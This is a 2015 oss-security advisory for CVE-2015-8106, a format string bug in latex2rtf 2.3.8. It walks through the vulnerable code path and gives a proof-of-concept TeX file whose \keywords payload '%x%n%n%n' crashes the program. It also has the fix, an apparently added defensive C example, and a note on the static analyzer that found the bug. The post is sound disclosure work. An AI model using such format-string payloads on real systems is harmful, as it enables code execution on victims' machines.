Message-ID: <5649AD62.8040704@ropas.snu.ac.kr>
Date: Mon, 16 Nov 2015 19:18:10 +0900
From: 김종권 <jgkim@...as.snu.ac.kr>
To: oss-security@...ts.openwall.com
Cc: wslee@...as.snu.ac.kr
Subject: CVE-2015-8106 - latex2rtf v2.3.8 format string vulnerability
Dear List,
I am writing to report a format string vulnerability in the Ubuntu
package latex2rtf (2.3.8, which is the latest version).
I have also already been assigned a CVE identifier from MITRE,
"CVE-2015-8106", so I want to make this vulnerability public.
- Target Platform
Windows, Linux, OS X
- Target Version
2.3.8 (Latest Version)
- Vulnerability description
When the user runs latex2rtf with a maliciously crafted tex file, an
attacker can execute arbitrary code.
The function CmdKeywords processes the \keywords command in the tex file.
The variable `keywords' in the function CmdKeywords may hold a malicious
input string, which is then used as the format argument of vsnprintf.
-- Step 1. (funct1.c line 1789)
1789 char *keywords = getBraceParam();
For instance, the variable keywords will point to the string "MALICIOUS"
when a line "\keywords{MALICIOUS}" exists in the input tex file.
-- Step 2. (funct1.c line 1798)
1798 fprintRTF(keywords);
fprintRTF() is called in line 1798, and its parameter is used as the
format string, which can be malicious, as described in step 1.
-- Step 3. (main.c line 873)
858 void fprintRTF(char *format, ...){
...
873 vsnprintf(buffer, 1024, format, apf);
...
The value of format, which may be malicious, is used as the format
argument of vsnprintf in line 873; therefore arbitrary code can be executed.
-- Step 4. Our malicious input
"exploit.tex"
========================
\documentclass{article}
\begin{document}
\title{Exploitable}
\author{Jong-Gwon Kim}
\keywords{%x\%n\%n\%n}
\end{document}
=========================
Execute
==========================
~ $ latex2rtf -v
latex2rtf 2.3.8 r1240 (released June 16 2014)
Copyright (C) 2012 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Prahl, Lehner, Granzer, Dorner, Polzer, Trisko, Schlatterbeck.
~ $ latex2rtf exploit.tex
aborted (core dumped)
==========================
-- Step 5. How to fix
(funct1.c line 1798)
1798 fprintRTF(keywords); ===> fprintRTF("%s", keywords);
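The pattern behind steps 2 to 5, as an added example that is not latex2rtf's own code: a stand-in for fprintRTF() (hypothetical name rtf_printf) carrying the printf format attribute so the compiler flags non-literal format strings, the hardened "%s" call from the fix, and a small audit helper that counts conversion directives in text about to be used as a format.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Stand-in for latex2rtf's fprintRTF() (hypothetical name rtf_printf). The
 * format attribute makes gcc/clang -Wformat-security warn on any call that
 * passes a non-literal as the format, i.e. the pattern at funct1.c:1798. */
__attribute__((format(printf, 3, 4)))
static int rtf_printf(char *out, size_t n, const char *format, ...)
{
    va_list ap;
    va_start(ap, format);
    int written = vsnprintf(out, n, format, ap); /* same call as main.c:873 */
    va_end(ap);
    return written;
}

/* Hardened form of the fixed line: document text is passed as a "%s"
 * argument, never as the format string. Returns the byte count written. */
int render_keywords(const char *keywords, char *out, size_t n)
{
    return rtf_printf(out, n, "%s", keywords);
}

/* Audit helper: count conversion directives in text about to be used as a
 * format string ("%%" is a literal percent). Any non-zero count for data
 * taken from a document is a red flag for this bug class. */
int count_format_directives(const char *s)
{
    int count = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') { /* escaped percent, skip both */
            s++;
            continue;
        }
        count++;
    }
    return count;
}

int main(void)
{
    /* constructed input in the spirit of the advisory's \keywords payload */
    const char *keywords = "%x%n%n%n";
    char buf[128];
    render_keywords(keywords, buf, sizeof buf);
    printf("rendered verbatim: %s (%d directives)\n", buf,
           count_format_directives(keywords));
    return 0;
}
```

Compiling with -Wformat -Wformat-security and calling rtf_printf(buf, n, keywords) directly reproduces the warning a reviewer would have seen on the original line.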
- How we found the vulnerability
We used a static analyzer, Sparrow[1], to find the format string bug.
Our analyzer reported an alarm at latex2rtf main.c line 873, so we
looked at the latex2rtf source code and found the bug.
Sparrow is a state-of-the-art static analyzer that aims to verify the
absence of fatal bugs in C source. Sparrow is designed on the basis of
abstract interpretation, and the analysis is sound by design. Sparrow
adopts a number of well-founded static analysis techniques[2,3] for
scalability, precision, and user convenience.
References
[1]: http://ropas.snu.ac.kr/sparrow/
[2]: Selective Context-Sensitivity Guided by Impact Pre-Analysis. Hakjoo
Oh, Wonchan Lee, Kihong Heo, Hongseok Yang, and Kwangkeun Yi. PLDI'14.
[3]: Design and Implementation of Sparse Global Analyses for C-like
Languages. Hakjoo Oh, Kihong Heo, Wonchan Lee, Woosuk Lee, and Kwangkeun
Yi. PLDI'12.
Sincerely, Jong-Gwon Kim & Woosuk Lee
-----------------------------
Jong-Gwon Kim
Graduate student
ROPAS lab. (http://ropas.snu.ac.kr/)
ROSAEC center (http://rosaec.snu.ac.kr/)
Seoul National University
(tel) +82-2-880-1865
(email) jgkim@...as.snu.ac.kr
-----------------------------
-----------------------------
Woosuk Lee
Ph.D. candidate
ROPAS lab. (http://ropas.snu.ac.kr/)
ROSAEC center (http://rosaec.snu.ac.kr/)
Seoul National University
(tel) +82-2-880-1865
(email) wslee@...as.snu.ac.kr
-----------------------------